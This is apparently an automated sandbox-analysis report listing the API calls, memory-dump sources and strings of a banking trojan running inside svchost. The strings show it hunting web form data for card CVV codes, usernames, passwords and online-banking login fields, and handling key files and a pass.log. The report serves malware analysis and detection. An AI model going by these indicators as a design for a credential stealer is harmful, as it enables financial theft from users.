                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcae9f3c2aff0cfe2077f126b346eb15be1853f557f60f7ee63ca67ae8b98b67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80313471981324BBE7209B54DC49FEE77AC9F05B14F004684FA45AA2C0DBF05A908BE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 0266DB7A
                                                                                                                                                                                                              • strchr.MSVCRT ref: 0266DB89
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 0266DC75
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0266DC89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                              • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02671278
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0267128E
                                                                                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 026712A8
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 026712B3
                                                                                                                                                                                                              • bind.WS2_32(00000000,?,00000010), ref: 026712CB
                                                                                                                                                                                                              • listen.WS2_32(00000000,00000005), ref: 026712D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02662B5E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02662B83
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02662B95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileModuleNamememset
                                                                                                                                                                                                              • String ID: \clmain.exe
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 0266E119
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 0266E15E
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0266E1D2
                                                                                                                                                                                                              • free.MSVCRT ref: 0266E1FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02660830
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a75f), ref: 02660857
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02660895
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0266089F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026608A7
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026608B9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026608C0
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 026608FC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0266090A
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a75f,?,?), ref: 02660945
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0266097F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02660989
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02660991
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026609A0
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026609A7
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 026609D5
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02660A00
                                                                                                                                                                                                              • memset.MSVCRT ref: 02660A4B
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 02660A65
                                                                                                                                                                                                              • memset.MSVCRT ref: 02660AA8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 02660AC2
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,0268A5BC,00000002,?,?,?), ref: 02660AE7
                                                                                                                                                                                                              • memset.MSVCRT ref: 02660B2A
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 02660B44
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 02660B69
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02660BA1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02660BA4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02660BB0
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02660BB3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 02660BC0
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02660BE6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 02660C08
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 02660C23
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 02660C2E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?), ref: 02660C39
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 02660C40
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 02660C50
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02660C62
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 02660C8F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02660C92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02660C9F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02660CA2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 02660CAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02660CAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 02660CBF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02660CC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$AdminAttributesBackslashFolderHandleMakeMutexSystemUser$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                              • String ID: 8a99a75f$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$S:(ML;;NRNWNX;;;LW)$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                              • API String ID: 1233543684-3133241077
                                                                                                                                                                                                              • Opcode ID: 0c95a98ef21ac519a611d22a0c1b2beb9238293cb20b5e5ac4fcdf1e96838cee
                                                                                                                                                                                                              • Instruction ID: 3c759b5665824ce623b4b1c863d6cda4eb07a2ec58b2711e605778d599bfbaec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c95a98ef21ac519a611d22a0c1b2beb9238293cb20b5e5ac4fcdf1e96838cee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AD1E370944381AFE7219B649C5CFBF7BE9BF89704F444A28F58697240EB74D448CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 026589F2
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,02650BE3), ref: 02658A0F
                                                                                                                                                                                                                • Part of subcall function 02654170: GetProcessHeap.KERNEL32(00000008,02650BF7,02650BE3,?,02658A25,?,?,?), ref: 02654181
                                                                                                                                                                                                                • Part of subcall function 02654170: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02654188
                                                                                                                                                                                                                • Part of subcall function 02654170: memset.MSVCRT ref: 02654198
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,02650BE3,?,?,?), ref: 02658A35
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,76F8F380,00000000,00000001,00000000,?,?,?,02658A44,?,?,?,?,?), ref: 0265E433
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E441
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02658A44,?,?,?,?,?,?), ref: 0265E44D
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E45B
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02658A44,?,?,?,?,?,?), ref: 0265E467
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E479
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: strstr.MSVCRT ref: 0265E48F
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: strstr.MSVCRT ref: 0265E4A2
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 0265E50B
                                                                                                                                                                                                                • Part of subcall function 026644A0: strstr.MSVCRT ref: 026644DC
                                                                                                                                                                                                                • Part of subcall function 026644A0: strstr.MSVCRT ref: 026644EF
                                                                                                                                                                                                                • Part of subcall function 026644A0: strstr.MSVCRT ref: 02664502
                                                                                                                                                                                                                • Part of subcall function 026644A0: PathAddBackslashA.SHLWAPI(0269D2A0), ref: 02664528
                                                                                                                                                                                                                • Part of subcall function 026644A0: PathAddBackslashA.SHLWAPI(0269D2A0), ref: 02664562
                                                                                                                                                                                                                • Part of subcall function 026644A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 026645CD
                                                                                                                                                                                                                • Part of subcall function 026644A0: GetLastError.KERNEL32 ref: 026645D7
                                                                                                                                                                                                                • Part of subcall function 02661A60: strstr.MSVCRT ref: 02661A83
                                                                                                                                                                                                                • Part of subcall function 02661A60: strstr.MSVCRT ref: 02661A92
                                                                                                                                                                                                                • Part of subcall function 02661A60: strstr.MSVCRT ref: 02661AA1
                                                                                                                                                                                                                • Part of subcall function 02661A60: PathAddBackslashA.SHLWAPI(0269D4A8), ref: 02661ACD
                                                                                                                                                                                                                • Part of subcall function 02661A60: PathAddBackslashA.SHLWAPI(0269D4A8), ref: 02661B03
                                                                                                                                                                                                                • Part of subcall function 02661A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02661B6C
                                                                                                                                                                                                                • Part of subcall function 02661A60: GetLastError.KERNEL32 ref: 02661B76
                                                                                                                                                                                                                • Part of subcall function 02661A60: IsUserAnAdmin.SHELL32 ref: 02661B7E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?,?), ref: 02658A5C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?,?), ref: 02658A6C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A6EF,?,?,?,?,?,?), ref: 02658A9D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8A99A6EF,?,?,?,?,?,?), ref: 02658AAB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02658AB8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A6EF,?,?,?,?,?,?), ref: 02658ABF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?,?), ref: 02658B2E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a6dd,?,?,?,?,?,?), ref: 02658B5D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8a99a6dd,?,?,?,?,?,?), ref: 02658B6B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02658B78
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a6dd,?,?,?,?,?,?), ref: 02658B7F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?,?), ref: 02658BF3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?,?), ref: 02658C03
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?,?), ref: 02658C13
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A63B,?,?,?,?,?,?), ref: 02658C3D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8A99A63B,?,?,?,?,?,?), ref: 02658C4B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02658C58
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A63B,?,?,?,?,?,?), ref: 02658C5F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?,?), ref: 02658CCF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a7e1,?,?,?,?,?,?), ref: 02658CFD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8a99a7e1,?,?,?,?,?,?), ref: 02658D0B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02658D18
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a7e1,?,?,?,?,?,?), ref: 02658D1F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?,?), ref: 02658D93
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a767,?,?,?,?,?,?), ref: 02658DBD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8a99a767,?,?,?,?,?,?), ref: 02658DCB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a767,?,?,?,?,?,?), ref: 02658DD6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?,?), ref: 02658E43
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269CF94,?,?,?,?,?,?), ref: 02658E6D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,0269CF94,?,?,?,?,?,?), ref: 02658E7B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269CF94,?,?,?,?,?,?), ref: 02658E86
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02663570,00000000,00000000,00000000), ref: 02658EE8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02650BE3,?,?,?,?,?,?), ref: 02658F00
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 02658F11
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$AdminAllocateCloseInformationReadThreadUsermemcpy
                                                                                                                                                                                                              • String ID: &LOGIN_AUTHORIZATION_CODE=$8A99A63B$8A99A6EF$8a99a6dd$8a99a767$8a99a7e1$CryptoPluginId=AGAVA&Sign$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                              • API String ID: 899697972-2038118066
                                                                                                                                                                                                              • Opcode ID: d8e4d7c68a0527e0bd138617bec6b6355b73aefa5701edfad96468a68266ffb3
                                                                                                                                                                                                              • Instruction ID: 348e88d3a3994a69d3e2d7f5094d6a1c51d43c0249ab3f1e12ac3801987cf360
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8e4d7c68a0527e0bd138617bec6b6355b73aefa5701edfad96468a68266ffb3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79D13531A45264ABDB22AB289C40BEE7FE89F59B00F14458AEDC597300DF7099C5CFE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02650981
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02650984
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265099E
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 026509BE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026509DF
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026509E2
                                                                                                                                                                                                              • memset.MSVCRT ref: 026509F7
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02650A0D
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02650A29
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02650A3C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02650A4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02650A4F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650A6A
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02650A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02650AC9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02650ACC
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650AE0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650AF0
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02650AFE
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02650B40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02650B6C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650B6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02650B7C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650B7F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650B8B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650B8E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650B9B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650B9E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650BB4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650BB7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650BC4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650BC7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02650BE6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650BEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650BF8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650BFB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650C07
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650C0A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650C13
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650C16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                              • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                              • API String ID: 1808236364-2343086565
                                                                                                                                                                                                              • Opcode ID: 8587309b80510e1e81b6814278548947236b3a5dd5bd752d98aa683ab83f7e6b
                                                                                                                                                                                                              • Instruction ID: 9e1e2de8fcf076373d8b8ad364bfc846c2948aef4dc26232e099102ab71f4706
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8587309b80510e1e81b6814278548947236b3a5dd5bd752d98aa683ab83f7e6b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAA1BE71900219BBDB10DFA49C49FAFBBB8EF89714F158648FD05A7380DB71D9448BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 02652AAC
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02652AC5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02652ACC
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 02652B0B
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02652B25
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02652B2F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02652BA8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02652BCE
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02652BED
